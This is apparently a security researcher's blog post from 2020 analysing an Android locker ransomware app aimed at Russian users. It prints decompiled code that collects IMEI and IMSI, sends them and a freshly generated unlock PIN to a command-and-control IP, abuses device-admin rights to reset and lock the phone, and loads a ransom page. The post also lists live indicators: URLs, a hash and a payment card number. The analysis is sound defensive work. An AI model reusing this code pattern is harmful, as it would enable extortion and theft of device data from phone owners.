Sunday, 17 May 2020

Android Locker targeting Russian Users

On 15th of May 2020, a malicious Android application was found hosted at the URL: hxxp://94.140.115.85/googleplay/install/install.apk

This application has the capability to add a device administrator and use it to reset the password of the Android phone. Once the phone is locked, the application will demand a ransom from the user to unlock the phone.

In this blog, I will describe the functionality of this Android locker.

MD5 hash of the APK file: a67480f99005d99cdff2dc1e2002536c
Filename: install.apk
URL: hxxp://94.140.115.85/googleplay/install/install.apk
Package name: com.chrome.beta

From the AndroidManifest.xml we can see that 4 receivers are present in this application:

Listen - handles DEVICE_ADMIN_ENABLED intent
TryDisable - handles trydisable intent.
Work - handles spwd intent
Boot - handles BOOT_COMPLETED intent

The MainActivity class is shown below.


In the MainActivity, it fetches the IMEI and IMSI values from the phone using the "phone" system service as shown below.

    Object localObject = (TelephonyManager)getSystemService("phone");
    paramBundle = ((TelephonyManager)localObject).getSubscriberId();
    String str = ((TelephonyManager)localObject).getDeviceId();

This data is sent to the C&C server in an HTTP GET request as shown below.

    new Request().execute(new String[] { "http://95.217.223.24/chceimw.php?imei=" + str + "&imsi=" + paramBundle + "&action=1" });

GET /chceimw.php?imei=000000000000000&imsi=XXXXX0000000000&action=1 HTTP/1.1
Host: 95.217.223.24
Connection: close
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Adding a new device administrator

The code section below will add a new device administrator:

    localObject = new ComponentName(this, Listen.class);
    Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
    localIntent.putExtra("android.app.extra.DEVICE_ADMIN", (Parcelable)localObject);
    localIntent.putExtra("android.app.extra.ADD_EXPLANATION", getString(2131034113));

Below is the message displayed on the phone when the user is asked to install a new Device Administrator.


The policy for the new device admin is set to the Listen class.

Once the device admin is added, the onEnabled() method in the Device admin class will be called as shown below.



The onEnabled() method will broadcast an intent with the name: "spwd" which will be handled by the Work Class (this receiver is defined in the AndroidManifest.xml file).

paramContext.sendBroadcast(new Intent("spwd"));

Resetting Password and Locking the Phone

Let's look at the Work class which handles the intent with the name: "spwd".


It performs the following operations.

1. Fetches the IMSI and IMEI values using the getSubscriberId() and getDeviceId() methods of the phone system service.

2. Generates a new random password as shown below:

String str = String.valueOf(new Random().nextInt(888868) + 111112);

3. Uses the system service. "device_policy" to reset the password and lock the phone as shown below.

    localDevicePolicyManager.resetPassword(str, 1);
    localDevicePolicyManager.lockNow();

4. Sends an HTTP GET request with the IMSI, IMEI and randomly generated password as shown below:

    new Request().execute(new String[] { "http://95.217.223.24/chceimw.php?imei=" + (String)localObject + "&imsi=" + paramIntent + "&data=" + str });

5. Once the password is successfully set, the onPasswordSucceeded() method in the Listen() class will be called as shown below.

    paramIntent = new Intent(paramContext, WebActivity.class);
    paramIntent.addFlags(268435456);
    try
    {
      paramContext.startActivity(paramIntent);

This method will start the activity called WebActivity.

The onCreate() method in the Web Activity will create a webView and load the ransom message from the URL: hxxp://95.217.223.24/payment-ban-2985910/ as shown below.

  public void onCreate(Bundle paramBundle)
  {
    super.onCreate(paramBundle);
    getWindow().addFlags(4719616);
    setContentView(2130903040);
    this.webView = ((WebView)findViewById(2131099648));
    this.webView.loadUrl("http://95.217.223.24/payment-ban-2985910/");

The ransom message displayed on the Android phone is shown below.


The phone will immediately be locked by the ransomware. Once the user tries to unlock the phone with the old PIN, the above ransom message is displayed.

This message is asking the user to send 1000 roubles to the payment address: 4693 9575 8653 7180

c0d3inj3cT